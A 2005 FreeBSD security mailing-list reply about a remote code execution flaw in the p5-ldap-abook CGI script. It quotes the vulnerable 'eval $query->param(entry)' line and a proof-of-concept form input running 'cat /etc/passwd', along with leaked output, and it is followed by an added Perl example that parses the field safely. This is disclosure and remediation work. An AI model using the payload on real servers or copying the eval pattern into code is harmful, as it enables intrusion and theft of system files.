FreeBSD Port: p5-ldap-abook-1.00
Simon L. Nielsen
simon at FreeBSD.org
Fri Nov 18 02:17:52 PST 2005
On 2005.11.18 12:55:20 +0300, Roman Mashirov wrote:
> This cgi script contains remote code exec. In the following code (line 128):
> my $attr = eval $query->param(entry);
> script directly evaluates cgi parameter, received from client, so <input
> type=hidden name=entry value="system 'cat /etc/passwd';"> leads to the
> following output from script:
>
> # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
> # root:*:0:0:Charlie &:/root:/bin/csh
Yay! :-/
Have you tried to exploit it and verified that this exploit works? (I
don't see any input checking from a quick check but I cannot check
before tonight CET).
--
Simon L. Nielsen
FreeBSD Security Team
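
An added example, not part of the original thread or of the port's code: the quoted line passes the `entry` parameter to string `eval`, and the sketch below parses the same parameter as data instead. It assumes the field carries a flat attribute map; the JSON encoding, the `parse_entry` name and the attribute allowlist are hypothetical choices made for illustration.

```perl
#!/usr/bin/perl
# Added example: treat the "entry" CGI parameter as data, never as Perl code.
# Assumption: the field carries a flat attribute => value map. JSON is a
# swapped-in encoding, not what the port's script actually uses.
use strict;
use warnings;
use JSON::PP ();

# Hypothetical allowlist of attribute names the form may submit.
my %ALLOWED = map { $_ => 1 } qw(cn sn mail telephoneNumber);

# Returns a hashref of validated attributes, or undef if the input is rejected.
sub parse_entry {
    my ($raw) = @_;
    return unless defined $raw && length($raw) <= 4096;

    # decode() dies on anything that is not well-formed JSON. The block eval
    # only traps that exception; it never compiles $raw as Perl.
    my $data = eval { JSON::PP->new->utf8->decode($raw) };
    return unless ref($data) eq 'HASH';

    my %attr;
    for my $name (keys %$data) {
        my $value = $data->{$name};
        return unless $ALLOWED{$name};                 # unknown attribute
        return if !defined($value) || ref($value);     # plain scalars only
        return if $value =~ /[\x00-\x1f]/;             # no control characters
        $attr{$name} = $value;
    }
    return \%attr;
}

# Constructed sample inputs: a well-formed entry, and the string from the report.
my @samples = (
    '{"cn":"Jane Doe","mail":"jane@example.org"}',
    q{system 'cat /etc/passwd';},
);
for my $raw (@samples) {
    my $attr = parse_entry($raw);
    print defined $attr
        ? "accepted: " . join(", ", map { "$_=$attr->{$_}" } sort keys %$attr) . "\n"
        : "rejected: input is not a valid entry\n";
}
```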